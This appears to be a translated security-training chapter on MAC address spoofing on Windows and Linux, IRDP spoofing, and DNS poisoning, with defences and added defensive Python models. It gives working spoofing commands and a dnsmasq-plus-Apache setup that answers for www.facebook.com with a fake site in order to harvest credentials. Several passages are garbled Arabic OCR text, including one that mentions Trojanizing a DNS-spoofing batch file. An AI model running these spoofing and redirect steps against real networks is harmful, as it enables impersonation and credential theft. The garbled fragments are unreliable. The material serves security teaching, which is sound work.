In the Property list select Network Address. The same dialog is reachable from Device Manager: Network adapters > the adapter > Properties > Advanced.

[Screenshot: Device Manager with Network adapters expanded, showing "Atheros AR8121/AR8113/AR8114 PCI-E Ethernet Controller".]

Select Value, type the new MAC address as 12 hexadecimal digits without separators, and click OK. Verify the new MAC address with ipconfig /all or net config rdr. If the Network Address property is missing, the driver does not support cloning and the registry method must be used.

[Screenshot: Broadcom NetLink (TM) Gigabit Ethernet Properties, Advanced tab. The Property list includes Flow Control, Interrupt Moderation, Jumbo Packet, Large Send Offload (IPv4), Large Send Offload Version 2 (IPv4/IPv6), Network Address, Priority & VLAN, Receive Side Scaling, RSS Queues, Speed & Duplex, TCP/UDP Checksum Offload (IPv4/IPv6), VLAN ID; the Value field is on the right.]

Method 2: through the registry. When the adapter's Advanced tab offers no Network Address property (the NIC driver does not support cloning MAC addresses), the address is set directly in the registry:

- Go to Start > Run, type regedt32 and press Enter to open the registry editor. (Note: do not use regedit for this.)
- In the registry editor navigate to:
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
- Under this key there is one subkey per network adapter, named 0000, 0001, 0002 and so on. Open each and look at its DriverDesc value to find the adapter whose address you want to change.
- In that subkey create a new String Value (type REG_SZ) named NetworkAddress (right-click > New > String Value), and set its data to the new MAC address as 12 hexadecimal digits without separators.
- Disable and re-enable the adapter (or reboot) for the new address to take effect, then verify it with ipconfig /all.



[Screenshot: Registry Editor opened at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}, subkeys 0000 to 0005 listed, the values of one adapter subkey (FlowControl, InterruptModeration, JumboPacket, MediaType, PhysicalMediaType, ReceiveBuffers, SpeedDuplex, TCPChecksumOffload, TransmitBuffers, ...) shown on the right, and the context menu New > String Value open.]
MAC Spoofing Tool: SMAC

Source: http://www.klcconsulting.net

SMAC is a MAC address changer (MAC spoofer) for Windows systems (including Windows 2003 and 2000). It changes the software-based MAC address that the operating system uses, whether or not the driver offers the option; it cannot change the hardware burned-in MAC address. The new address takes effect after the adapter is restarted, which the tool can do automatically. SMAC includes a MAC address lookup (MAC Address Lookup, for the vendor of an address), can generate random MAC addresses, and shows for each NIC: Device ID, Active status, NIC description, NIC Manufacturer, Spoofed status (Yes/No), IP address, Active MAC address, Spoofed MAC address, NIC Hardware ID and NIC Configuration ID. According to its author the tool is intended for tasks such as:

Troubleshooting network problems, testing intrusion detection/prevention systems (IDS/IPSs), testing incident response plans, building high-availability solutions, recovering (MAC-address-based) software licenses, etc.



[Screenshot: SMAC 2.0 Evaluation Mode (KLC Consulting: www.klcconsulting.net). The main window lists the adapter (Atheros AR8121/AR8113/AR8114 PCI-E Ethernet, IP address 192.168.254.100, Active MAC Address 00-30-18-AF-A5-0A, Spoofed MAC Address: Not Spoofed), the "Show Only Active Network Adapters" option, the "New Spoofed MAC Address" field, and the Update MAC, Remove MAC, Restart Adapter, IPConfig, MAC List, Refresh and Exit buttons. The status bar carries the vendor's disclaimer that the program is not to be used for any illegal or unethical purpose.]



To spoof your own MAC address, select the adapter in the list and type the new address into the "New Spoofed MAC Address" field.



[Screenshot: the same SMAC 2.0 window after the adapter (ID 0000, Active: Yes, IP 192.168.254.100, Active MAC 00-30-18-AF-A5-0A) has been selected; a new address has been entered in the New Spoofed MAC Address field, the Network Connection shows "Ethernet" and the Hardware ID field shows pci\ven_1969&dev_1026&subsys_10261969&rev_b0.]
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D2XXXXXXXXXX 
D6XXXXXXXXXX 
DAXXXXXXXXXX 
DEXXXXXXXXXX 

Instead of typing an address you can let SMAC generate a random MAC address with the Random button.

Before applying the change, enable the "Automatically Restart Adapter" option in the Options menu so that the adapter is restarted and the new address takes effect immediately.
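As an added example (not part of the original page or of SMAC), the following Python script shows what the D2/D6/DA/DE prefixes listed above have in common and how a defender can pick out locally administered addresses, which is what SMAC's Random button and Technitium's '02' first-octet option produce; the lease list and its IP addresses are constructed for the demonstration.

```python
import re
from typing import List, Tuple


def parse_mac(text: str) -> bytes:
    """Accept any spelling seen on this page (00-30-18-AF-A5-0A,
    12:00:15:b7:36:92 or 003018AFA50A) and return the six raw bytes."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", text)
    if len(digits) != 12:
        raise ValueError(f"not a MAC address: {text!r}")
    return bytes.fromhex(digits)


def format_mac(mac: bytes) -> str:
    return ":".join(f"{b:02X}" for b in mac)


def is_multicast(mac: bytes) -> bool:
    # Bit 0 of the first octet is the I/G bit: 1 = group (multicast) address.
    return bool(mac[0] & 0x01)


def is_locally_administered(mac: bytes) -> bool:
    # Bit 1 of the first octet is the U/L bit: 1 = locally administered,
    # i.e. chosen by software rather than assigned by the NIC vendor.
    return bool(mac[0] & 0x02)


def classify(text: str) -> str:
    mac = parse_mac(text)
    if is_multicast(mac):
        return "multicast"
    if is_locally_administered(mac):
        return "locally-administered"
    return "universally-administered"


def locally_administered_unicast_prefixes(high_nibble: int) -> List[str]:
    """All first octets with the given high nibble that are unicast (bit 0 clear)
    and locally administered (bit 1 set). For high nibble 0xD this is exactly
    the D2/D6/DA/DE list above: the low nibble must be 2, 6, A or E."""
    return [f"{(high_nibble << 4) | low:02X}"
            for low in range(16) if (low & 0x03) == 0x02]


def flag_locally_administered(leases: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Given (ip, mac) pairs, e.g. from a DHCP lease file, return those whose MAC
    is locally administered. On a network where every host should carry a
    vendor-assigned address these deserve a second look. Note the limit of the
    check: an attacker who copies a vendor-range address is not caught by it."""
    return [(ip, mac) for ip, mac in leases
            if classify(mac) == "locally-administered"]


# Constructed sample leases; the MAC values are the ones shown on this page.
SAMPLE_LEASES = [
    ("192.168.254.100", "00-30-18-AF-A5-0A"),  # SMAC's adapter, not spoofed
    ("192.168.1.2", "00-0C-29-C3-FC-C5"),      # VMware vendor prefix, original address
    ("192.168.1.3", "12:00:15:b7:36:92"),      # set with ifconfig in the Linux example
    ("192.168.1.4", "74:de:3b:9f:d8:4b"),      # set with ip link, but looks vendor-assigned
]

if __name__ == "__main__":
    print(locally_administered_unicast_prefixes(0xD))
    for ip, mac in SAMPLE_LEASES:
        print(ip, format_mac(parse_mac(mac)), classify(mac))
```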



[Screenshot: SMAC 2.0 Evaluation Mode with the Options menu open; "Automatically Restart Adapter" and "Log MAC Address Changes" are checked. The adapter (ID 0000, Active: Yes, Active MAC 00-30-18-AF-A5-0A, Network Connection: Ethernet, Hardware ID pci\ven_1969&dev_1026&subsys_10261969&rev_b0) is selected, a new address has been entered in the New Spoofed MAC Address field, and the Random button is visible next to Update MAC, Remove MAC, Restart Adapter, IPConfig, MAC List, Refresh and Exit.]



Click "Update MAC" to apply the change. The network connection is briefly interrupted while the adapter restarts, after which the new address appears as the Active MAC Address of the adapter in the list. You can confirm the change with the IPConfig button, which shows the output of ipconfig for the machine. To return to the NIC's original, burned-in address, click "Remove MAC".


Note: other tools do the same job, such as Technitium MAC Address Changer (TMAC), shown below, and SpoofMAC, covered in the Linux section.



[Screenshot: Technitium MAC Address Changer v6 (by Shreyas Zare). The Network Connections table lists Wired Ethernet Connection 1, 2 and 3 and Local Area Connection 9 with the columns Changed, MAC Address, Link Status and Speed; connection 3 is marked Changed: Yes, Up, Operational, 1 gbps. The Information tab shows the Connection Details (Device: Intel(R) PRO/1000 MT Network Connection #3, Hardware ID, Config ID, TCP/IPv4 and TCP/IPv6 enabled), the Original MAC Address 00-0C-29-C3-FC-C5 (VMware, Inc.) and the Active MAC Address 00-1E-A3-23-9F-D3 [Changed] (Nokia Danmark A/S), a "Change MAC Address" field with a "Random MAC Address" button, the options "Automatically restart network connection to apply changes", "Make new MAC address persistent" and "Use '02' as first octet of MAC address", a "Restore Original" button and the traffic counters (Received 4.25 MB, Sent 1.1 MB).]



https://www.facebook.com/tibea2004 





[Screenshot: Technitium MAC Address Changer v6, Presets tab. The Network Connection Presets panel (Default.tpf) lists the presets "Random MAC Address" and "Original MAC Address" with New, Edit, Delete and Apply buttons; the Property/Value table of the selected preset shows MAC Address: Use Random, IPv4 Address 192.168.1.2 [255.255.255.0], IPv4 Default Gateway 192.168.1.1 and IPv4 DNS Server 192.168.1.1.]



















































































How to Change a Computer's MAC Address in Linux 

jj&j ^SiA 4> o-aUJI MAC "Spoofed" ^ jh ^j^j .aj o-^UJI MAC u> "Spoof ^ * ^ 

b LjU& Jjju^ill s^Uil x& dj^i ^1 j "Spoofed" MAC u> j*- 







#sudo ifconfig eth0 down
#sudo ifconfig eth0 hw ether xx:xx:xx:xx:xx:xx
#sudo ifconfig eth0 up



chris@ubuntu1404vbox:~$ sudo ifconfig eth0 down
chris@ubuntu1404vbox:~$ sudo ifconfig eth0 hw ether 12:00:15:b7:36:92
chris@ubuntu1404vbox:~$ sudo ifconfig eth0 up
chris@ubuntu1404vbox:~$
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#ip link set dev xxxx down 




#ip link set dev xxxx address xx:xx:xx:xx:xx:xx 

Here xxxx is the name of the network interface (eth0 in the examples) and xx:xx:xx:xx:xx:xx is the new MAC address you want the interface to use.




Then bring the interface back up. The following session shows the whole sequence (the host name and the original address are blurred in the original screenshot):



$ sudo -i
[sudo] password for <user>:
root@<host>:~# ip link show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST> mtu 1500 qdisc pfifo_fast state DOWN mode DEFAULT qlen 1000
    link/ether xx:xx:xx:xx:xx:xx brd ff:ff:ff:ff:ff:ff
root@<host>:~# ip link set dev eth0 down
root@<host>:~# ip link set dev eth0 address 74:de:3b:9f:d8:4b
root@<host>:~# ip link set dev eth0 up



The MAC address can also be changed with the following tools:

1. macchanger

#sudo ifconfig eth0 down
#sudo macchanger -m AA:BB:CC:DD:EE:FF eth0
#sudo ifconfig eth0 up
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The main macchanger options are:

-h, --help                    Show summary of options
-V, --version                 Show version of program
-e, --ending                  Don't change the vendor bytes
-a, --another                 Set random vendor MAC of the same kind
-A                            Set random vendor MAC of any kind
-r, --random                  Set fully random MAC
-l, --list[=keyword]          Print known vendors (with keyword in the vendor's description string)
-m, --mac=XX:XX:XX:XX:XX:XX   Set the MAC XX:XX:XX:XX:XX:XX

Examples:

macchanger eth1
macchanger -A eth1
macchanger --ending eth1
macchanger --mac=01:23:45:67:89:AB eth1

2. SpoofMAC

https://github.com/feross/SpoofMAC

This tool sets the address of an interface with a single command, for example:

#spoof-mac set 00:00:00:00:00:00 en0

To restore the interface's original MAC address, use the reset command:

#spoof-mac reset wi-fi

3. parasite6

This tool does the equivalent on IPv6 networks, answering neighbor solicitations with a fake MAC address:

#parasite6 [-lRFHD] <interface> [fake-mac]

Its options are:

Option -l loops and resends the packets per target every 5 seconds
Option -R will also try to inject the destination of the solicitation
Options for NS security bypass: -F fragment, -H hop-by-hop and -D large destination header



IRDP Spoofing

ICMP Router Discovery Protocol (IRDP) is a routing protocol that lets a host discover the IP addresses of the active routers on its subnet: hosts listen for router advertisement messages and can request them with router solicitation messages. IRDP carries no authentication, so an attacker on the subnet can spoof router advertisements. A host that relies on IRDP to learn its default route accepts the advertisement with the highest preference; the attacker therefore sends an advertisement with a high preference and a long lifetime, so that his machine is installed as the host's default gateway and the entry stays in the routing table. From then on the victim's outbound traffic passes through the attacker's machine, which allows passive sniffing, man-in-the-middle and denial-of-service attacks, and the attacker can forward the traffic on to the real router so that the victim notices nothing. The figure below illustrates the attack.
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[Figure: IRDP spoofing. The attacker sends spoofed router advertisements to the victim, whose routing table is updated so that its default route points at the attacker's machine.]



How to Defend Against MAC Spoofing

Protecting the network against MAC spoofing is one of the security administrator's main tasks: an attacker who takes over the address of a legitimate host can get past MAC-based access controls and receive the traffic meant for that host, so the administrator needs equipment that detects and blocks spoofed addresses. Many of the countermeasures against MAC spoofing depend on the network's switches and routers, because those are the devices that see where each address appears. The simplest of them is port security: the switch limits the MAC addresses that may appear on a port and drops frames, or shuts the port down, when an unknown address shows up, which stops both MAC spoofing and the MAC flooding that often precedes it.

The following techniques defend against MAC address spoofing:

DHCP Snooping Binding Table: DHCP snooping filters untrusted DHCP messages and builds a binding table that records, for every host that obtained a lease, its MAC address, IP address, lease time, binding type, VLAN number and the interface it is connected to. This table is the reference used by the two checks that follow.

Dynamic ARP Inspection: checks the IP-to-MAC mapping in every ARP packet against the DHCP snooping binding table and drops ARP packets with invalid bindings, which defeats the ARP poisoning that usually accompanies MAC spoofing.

IP Source Guard: restricts IP traffic on untrusted Layer 2 ports by filtering it against the DHCP snooping binding table (or static bindings); a packet whose source IP address and MAC address are not bound together on that interface is dropped, so a host cannot spoof another host's addresses.

Encryption: encrypt the communication between the access point and the client, so that a spoofed MAC address by itself gives the attacker nothing usable.

Retrieval of MAC Address: obtain the MAC address from the NIC directly rather than from the operating system, since the software-configured address is the one that spoofing tools change.
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[Figure: IP Source Guard on a switch with DHCP snooping enabled. The binding table (IP address, MAC, lease, type, VLAN, interface) holds 10.10.10.1 with MAC A and 10.10.10.2 with MAC B. Traffic received from the host with IP 10.10.10.2 and MAC B matches its IP and MAC entry in the binding table and is forwarded; traffic sent with IP 10.10.10.2 and MAC C does not match, so the packet is discarded. The switch checks the MAC and IP fields to see whether the traffic from the interface is in the binding table; if not, the traffic is blocked.]
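The following Python model, added here and not part of the original page, implements the binding-table check that IP Source Guard and Dynamic ARP Inspection perform, with a constructed binding table modelled on the figure above (MAC A on 10.10.10.1, MAC B on 10.10.10.2, a spoofer with MAC C); the port names, the trusted uplink and the MAC values are assumptions.

```python
from dataclasses import dataclass
from typing import List, Set, Tuple


@dataclass(frozen=True)
class Binding:
    """One row of the DHCP snooping binding table."""
    ip: str
    mac: str
    vlan: int
    interface: str
    source: str = "dhcp-snooping"   # "static" for hosts that take no DHCP lease


@dataclass(frozen=True)
class Frame:
    """The fields a switch looks at: ingress port/VLAN and the claimed source addresses."""
    interface: str
    vlan: int
    src_mac: str
    src_ip: str


# Constructed binding table mirroring the figure (MAC A on .1, MAC B on .2) plus one static row.
BINDING_TABLE: List[Binding] = [
    Binding("10.10.10.1", "00:00:5E:00:53:0A", 10, "Gi0/1"),
    Binding("10.10.10.2", "00:00:5E:00:53:0B", 10, "Gi0/2"),
    Binding("10.10.10.50", "00:00:5E:00:53:50", 10, "Gi0/5", source="static"),
]
TRUSTED_PORTS: Set[str] = {"Gi0/24"}   # assumed uplink towards the DHCP server


def _bindings_for(table: List[Binding], interface: str, vlan: int) -> List[Binding]:
    return [b for b in table if b.interface == interface and b.vlan == vlan]


def ip_source_guard(table: List[Binding], frame: Frame,
                    trusted: Set[str] = TRUSTED_PORTS) -> Tuple[bool, str]:
    """IP Source Guard: on an untrusted port, forward an IP packet only if its
    source IP and source MAC appear together in a binding for that port/VLAN."""
    if frame.interface in trusted:
        return True, "trusted port, not inspected"
    candidates = _bindings_for(table, frame.interface, frame.vlan)
    if not candidates:
        return False, "no binding for this port: blocked"
    for b in candidates:
        if b.ip == frame.src_ip and b.mac.lower() == frame.src_mac.lower():
            return True, f"matches {b.source} binding"
    return False, "IP/MAC pair not in binding table: blocked"


def dynamic_arp_inspection(table: List[Binding], interface: str, vlan: int,
                           sender_ip: str, sender_mac: str,
                           trusted: Set[str] = TRUSTED_PORTS) -> Tuple[bool, str]:
    """Dynamic ARP Inspection applies the same lookup to the sender fields of an
    ARP packet, so a host cannot advertise another host's IP-to-MAC mapping."""
    if interface in trusted:
        return True, "trusted port, not inspected"
    ok = any(b.ip == sender_ip and b.mac.lower() == sender_mac.lower()
             for b in _bindings_for(table, interface, vlan))
    return (True, "valid ARP binding") if ok else (False, "invalid ARP binding: dropped")


# Constructed frames from the figure: the legitimate host B and a spoofer C claiming B's IP.
SAMPLE_FRAMES = [
    Frame("Gi0/2", 10, "00:00:5E:00:53:0B", "10.10.10.2"),   # host B, its own addresses
    Frame("Gi0/3", 10, "00:00:5E:00:53:0C", "10.10.10.2"),   # host C spoofing B's IP
    Frame("Gi0/2", 10, "00:00:5E:00:53:0B", "10.10.10.9"),   # host B spoofing an IP
    Frame("Gi0/5", 10, "00:00:5E:00:53:50", "10.10.10.50"),  # host with a static binding
]


def audit(frames: List[Frame] = SAMPLE_FRAMES,
          table: List[Binding] = BINDING_TABLE) -> List[Tuple[str, str, bool, str]]:
    """Run IP Source Guard over the sample frames; returns (port, claimed IP, verdict, reason)."""
    return [(f.interface, f.src_ip, *ip_source_guard(table, f)) for f in frames]


if __name__ == "__main__":
    for row in audit():
        print(row)
```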



8.6 DNS Poisoning

Having covered MAC spoofing and the countermeasures against it, we turn to the next attack: DNS poisoning. This section explains what DNS poisoning is, the techniques used to carry it out and the countermeasures against it.

DNS Poisoning Techniques

Before looking at DNS poisoning we need to understand DNS itself. The Domain Name Service (DNS) translates the domain names that people use (for example www.eccouncil.org) into the IP addresses that computers use (for example 208.66.172.56). When you type a domain name into your browser, your computer asks a DNS server for the matching address; if the server already has the record it answers at once, otherwise it asks other DNS servers until it finds the answer, caches it, and returns it. So when you ask for wikipedia.org, the name is resolved to 207.142.131.206 and the browser connects to that address, without you ever seeing the number. DNS poisoning is an attack on exactly this resolution process, as the following sections show.



[Figure: DNS resolution. Step 1: the client checks the resolver cache. Step 2: a domain name resolution request is sent to the DNS server. Step 3: the DNS server performs the DNS lookup against the authoritative server for company.com. Step 4: the IP address is returned to the resolver. Step 5: the resource record is written to the cache.]
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DNS poisoning, also called DNS spoofing, is a technique that tricks a DNS server into accepting information as authentic when it is not, so that a user who asks for a legitimate server is sent to a malicious server instead. Suppose a user wants to visit ABC.com: the attacker poisons the DNS data that the user's resolver relies on, replacing the IP address of ABC.com with the IP address of the attacker's malicious server, and the user's browser connects to the attacker's site without anything appearing wrong. The fake records can be inserted into a DNS server's cache, or the replies of an authoritative DNS server can be forged. Once the traffic is redirected, the attacker can record passwords and other sensitive information, or act as a man in the middle and relay the traffic to the real site so that the victim notices nothing.

DNS Poisoning

Let us look more closely at how a query is answered, because that is where the attack fits in. When a client needs an address it first checks its own resolver cache. If the name is not there, it sends a resolution request to its configured DNS server. That server checks its own cache; if it has no record for the name, it must find the authoritative DNS server for the domain, and it does so recursively: it asks an Internet root server, which refers it to the server responsible for the top-level domain (.com in this example), which in turn refers it to the authoritative DNS server of the company or organisation. The authoritative server returns the answer, the DNS server stores it in its cache and passes it back to the client.

Every DNS query carries a 16-bit transaction ID, and a reply is accepted only if it carries the same ID. Older DNS software (including older versions of BIND, the most widely used DNS server) chose transaction IDs predictably, so an attacker who can see or guess the ID of an outstanding query can send a forged reply that arrives before the legitimate one. In practice the attacker asks the target DNS server for the name he wants to poison and floods it with forged replies carrying candidate transaction IDs; a botnet may at the same time run a denial-of-service attack on the real authoritative server to slow its answer. If one forged reply matches, the DNS server stores the attacker's IP address in its cache, and every client that asks for that name afterwards is sent to the attacker's machine. The attacker can then sniff the victims' traffic or serve a fake page that harvests their credentials. The effect lasts until the poisoned record expires or is cleared, and it hits all users of that DNS server at once.
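The following Python example, added here and not part of the original page, shows the resolver-side checks that decide whether a forged reply of the kind described above is accepted (source address, destination port, transaction ID and question must all match) and quantifies why a 16-bit transaction ID alone is not enough; the packets, addresses and port numbers are constructed.

```python
import os
import struct
from typing import Optional, Tuple


def encode_name(name: str) -> bytes:
    """Domain name in DNS wire format: length-prefixed labels, root terminator."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError(f"bad label {label!r}")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_name(pkt: bytes, offset: int) -> Tuple[str, int]:
    """Decode an uncompressed name at offset; returns (name, offset after it)."""
    labels = []
    while True:
        length = pkt[offset]
        if length & 0xC0:
            raise ValueError("compression pointer in question section")
        offset += 1
        if length == 0:
            break
        labels.append(pkt[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels).lower(), offset


def build_query(name: str, qtype: int = 1, txid: Optional[int] = None) -> bytes:
    """Recursive query. The TXID comes from os.urandom rather than a counter,
    which removes the predictability the text describes in old BIND versions."""
    if txid is None:
        txid = int.from_bytes(os.urandom(2), "big")
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD=1, one question
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_packet(pkt: bytes) -> dict:
    txid, flags, qd, an, _ns, _ar = struct.unpack_from("!HHHHHH", pkt, 0)
    if qd != 1:
        raise ValueError("expected exactly one question")
    qname, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack_from("!HH", pkt, off)
    return {"id": txid, "is_response": bool(flags & 0x8000), "qname": qname,
            "qtype": qtype, "qclass": qclass, "ancount": an}


class PendingQuery:
    """What a resolver remembers about an outstanding query: its TXID, the
    question, the server it asked and the randomised UDP source port it used."""

    def __init__(self, name: str, qtype: int, server: Tuple[str, int], sport: int):
        self.packet = build_query(name, qtype)
        self.id = parse_packet(self.packet)["id"]
        self.qname, self.qtype = name.lower().rstrip("."), qtype
        self.server, self.sport = server, sport


def reply_is_acceptable(pending: PendingQuery, reply: bytes,
                        src: Tuple[str, int], dst_port: int) -> Tuple[bool, str]:
    """Accept a reply only if every field a blind spoofer would have to guess matches."""
    if src != pending.server:
        return False, "source address is not the server we asked"
    if dst_port != pending.sport:
        return False, "wrong destination port"
    try:
        r = parse_packet(reply)
    except (ValueError, IndexError, struct.error):
        return False, "malformed reply"
    if not r["is_response"]:
        return False, "QR bit not set"
    if r["id"] != pending.id:
        return False, "transaction ID mismatch"
    if (r["qname"], r["qtype"]) != (pending.qname, pending.qtype):
        return False, "question does not match"
    return True, "ok"


def build_forged_reply(txid: int, name: str, qtype: int, ip: str) -> bytes:
    """Constructed reply packet (one A record, TTL 60) used to exercise the checks."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", qtype, 1)
    rdata = bytes(int(x) for x in ip.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", qtype, 1, 60, 4) + rdata
    return header + question + answer


def spoof_success_probability(forged_replies: int, id_bits: int = 16, port_bits: int = 0) -> float:
    """Chance that at least one of N blind forged replies hits both the TXID and
    the source port. With only the 16-bit TXID, 65536 replies give about 63%;
    adding 16 bits of port randomisation drops that to about 0.0015%."""
    p_one = 2.0 ** -(id_bits + port_bits)
    return 1.0 - (1.0 - p_one) ** forged_replies
```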
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:AJUJ) cj(jkaJ) ^jj) <DNS Poisoning f j^* 6^ 

4% c^i BIND (i^^^ JMj ls^j Jj^j ^ ^ o-flUJI jl^aJI DNS f ^ ' "uffi c3^^) treewalk 

^llx^ ^ Treewalk A IP ub^ J] README.TXT J SjjSUI c-iLJI ^ ( L> AiJ3l 

DNS 

.4? <>aUJI IP jl jjo ^ IP jl jj& Jl^l j DNS-spoofing.bat ^» 
.(chess.exe :^) ^.m:-> ^ j j]j DNS-spoofing.bat Trojanize 

(j^ajl > ^ J Kjmj^ 4 vs > (j^aLkSI DNS J^-^j (Jl^f^l 'Trojanned <— fil^ll Jc- c ajjja^H jib LqaIc 

.^l*Jb oAJA\ ji^JI Jl jVftaJI TCP/IP 

.cdJl c_fl jjoj l$j <j^aLaJl DNS ^W^ 3 J ^J M1 J> 4jauJal3 DNS f^-^ <— S 

c^ull tf S c>j .^>3I XSECURITY ^j- ^ eM XSECURITY - 

There are several kinds of DNS poisoning attack, depending on where the attacker carries them out:

Intranet DNS spoofing (local network) 
Internet DNS spoofing (remote network) 
Proxy server DNS poisoning 
DNS cache poisoning 
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Intranet DNS Spoofing

When DNS poisoning is carried out on a local network (LAN) it is called intranet DNS spoofing. It is usually combined with ARP poisoning, because on a switched LAN the attacker has to be on the path between the victim and the router or DNS server in order to see the requests. Once the attacker sees a DNS request he reads its transaction ID and sends a forged reply that reaches the victim before the reply of the real DNS server.

The following figure shows intranet DNS spoofing:



[Figure: Intranet DNS spoofing. Rebecca (IP 10.0.0.3) asks for www.xsecurity.com; the router is 10.0.0.254. The attacker poisons the router and redirects the DNS requests to his machine, where he runs arpspoof/dnsspoof, and answers with a DNS response that points to a fake website. The fake website sniffs the credentials and redirects the request to the real website www.xsecurity.com (IP 200.0.0.45).]



The figure describes the attack as follows. The attacker runs arpspoof/dnsspoof on his machine to poison the ARP caches of the router and of Rebecca's machine. Rebecca's DNS request, which should reach the router, is therefore delivered to the attacker's machine, which answers with a DNS response carrying the IP address of the attacker's fake website instead of the real one. Rebecca's browser connects to the fake site and submits her credentials, which the attacker records before forwarding her to the real website, so she notices nothing.




Internet DNS Spoofing

Internet DNS spoofing, also called remote DNS poisoning, replaces the DNS server the victim uses with a rogue DNS server run by the attacker, which can be anywhere on the Internet on a machine with a static IP address. The attacker usually achieves this by infecting the victim's computer with a Trojan that changes the primary DNS server in its TCP/IP settings to the IP address of the attacker's server. From then on every name the victim resolves is answered by the attacker, who can send the victim to fake websites, capture credentials and act as a man in the middle (MITM) while forwarding the traffic to the real sites.

The following figure shows Internet DNS spoofing:
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[Figure: Internet DNS spoofing. The attacker infects Rebecca's machine (IP 10.0.0.5) with a Trojan and changes her DNS IP address to 200.0.0.2, a DNS server the attacker runs in Russia. When Rebecca asks "What is the IP of www.xsecurity.com?", her DNS request goes to 200.0.0.2 and her browser connects to the fake website at 65.0.0.2, which sniffs the credentials and redirects the request to the real website www.xsecurity.com (IP 200.0.0.45).]



Proxy Server DNS Poisoning

In proxy server DNS poisoning the attacker changes the proxy settings of the victim's browser so that they point at a proxy server under the attacker's control. All of the victim's web requests then pass through the attacker's machine, which resolves names as it pleases and serves fake pages while relaying the remaining traffic to the real websites. The following figure shows proxy server DNS poisoning:




[Figure: Proxy server DNS poisoning. The attacker infects Rebecca's computer (IP 10.0.0.5) by changing her Internet Explorer proxy address to 200.0.0.2, a proxy server the attacker runs in Russia. All of Rebecca's web requests go through the attacker's machine, which sends them to a fake website; the fake website sniffs the credentials and redirects the request to the real website www.xsecurity.com (IP 200.0.0.45).]



DNS Cache Poisoning

A DNS resolver keeps a cache memory of the domain names it has recently resolved together with their IP addresses, so that repeated requests can be answered without asking other servers again. In DNS cache poisoning the attacker adds false entries to this cache (the DNS cache), or alters existing ones, so that the resolver returns the attacker's IP address for a legitimate domain name.
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Every client that afterwards asks the poisoned resolver for that domain is sent to the attacker's fake website, and the false answer is handed out to everyone who uses that resolver until the poisoned entry expires.

The following figure shows DNS cache poisoning:




[Figure: DNS cache poisoning. A client sends a query for DNS info to the internal DNS server. The attacker's rogue DNS answers with the IP of a fake website before the authoritative server for xsecurity.com does; the DNS cache is updated with the IP of the fake website, and the client is directed to the fake website.]



DNS Spoofing With a Simple DNS Server Using Dnsmasq in Kali

DNS is responsible for translating the host names typed into the browser into IP addresses, and the browser has no way of knowing on its own which IP address "example.com" really has: it trusts whatever the DNS server answers. Whoever controls the DNS responses a client receives can therefore direct its connections to any IP address he chooses, provided the client uses a DNS server he controls, and can either send the connection to a different site or pass it through a man-in-the-middle (MITM) system.

This has two common uses:

Blocking sites: firewalls and parental-control products use exactly this kind of DNS forgery/spoofing to keep users away from certain Internet sites, by answering queries for those names with an address that leads nowhere or to a block page.

Man in the middle (MITM): the DNS answer points the client at a machine the attacker controls, which accepts the connection and relays it to the real server while recording everything with tools such as wireshark, mitmproxy or SSLsplit. This works directly against protocols that do not authenticate the server (HTTP, SMTP and the like); with SSL (HTTPS) the client can see that the certificate does not belong to the site it asked for.
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Setting up a spoofing DNS server with Dnsmasq

First install Dnsmasq, and check that it is present on the system, with the following command:

#apt-get install dnsmasq-base

Dnsmasq is a lightweight DNS and DHCP server that is easy to configure, which makes it a good fit here; if it is not already installed on your Kali/Linux system, install it with apt-get as shown.

Configuring Dnsmasq

Dnsmasq reads its configuration from /etc/dnsmasq.conf. We do not need its DHCP function here, so make sure the configuration contains the following lines (add them if they are missing):

no-dhcp-interface= 

server=8.8.8.8 

no-hosts 

addn-hosts=/etc/dnsmasq.hosts 

The server line tells Dnsmasq which upstream DNS server to use for the queries it cannot answer itself (here Google's server at 8.8.8.8). The no-hosts line stops it from reading the local /etc/hosts file, and addn-hosts names the file, /etc/dnsmasq.hosts, from which it takes the names we want to answer ourselves. The no-dhcp-interface line is there because we do not want Dnsmasq's DHCP function, which is not needed and could interfere with the network's real DHCP server. Now create /etc/dnsmasq.hosts and add the entries you want to spoof, one IP address followed by one or more names per line, for example:

192.168.1.99 www.facebook.com 

192.168.1.98 www.microsoft.com microsoft.com 

192.168.1.97 www.any.domain any.domain

Then start Dnsmasq as follows. It may already be running as a daemon, so kill it first (or restart it so that it reads the new configuration). For testing it is convenient to run it in the foreground in debug mode with --no-daemon and with --log-queries, so that every query it receives is written to STDOUT and you can follow what is happening:

#killall -9 dnsmasq

#dnsmasq --no-daemon --log-queries

Any client that uses this machine as its DNS server now receives our answers. Note the difference between HTTP and HTTPS: with HTTPS the browser checks that the server's certificate matches the name it asked for, so the client sees a warning unless the attacker also holds a valid certificate for that name; plain HTTP makes no such check, so the spoofed answer passes unnoticed.

For example, a client asking for "www.facebook.com" is given the address 192.168.1.99, and its HTTP request for "www.facebook.com" arrives at that address. To serve something there, install Apache on that machine and define a virtual host for the name by adding the following to the Apache configuration:

<VirtualHost *:80> 
DocumentRoot "/srv/www/fakebook/public_html" 
ServerName www.facebook.com 

</VirtualHost> 

The pages the client is to see go in /srv/www/fakebook/public_html.
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How to defend against DNS spoofing

As the examples above show, any of the DNS spoofing techniques leaves a user at the attacker's mercy. The following measures reduce the risk:

- Resolve all DNS queries through a local DNS server under your control, and block DNS requests from going out to external servers.
- Configure DNSSEC, so that DNS answers are signed and a forged record can be recognised.
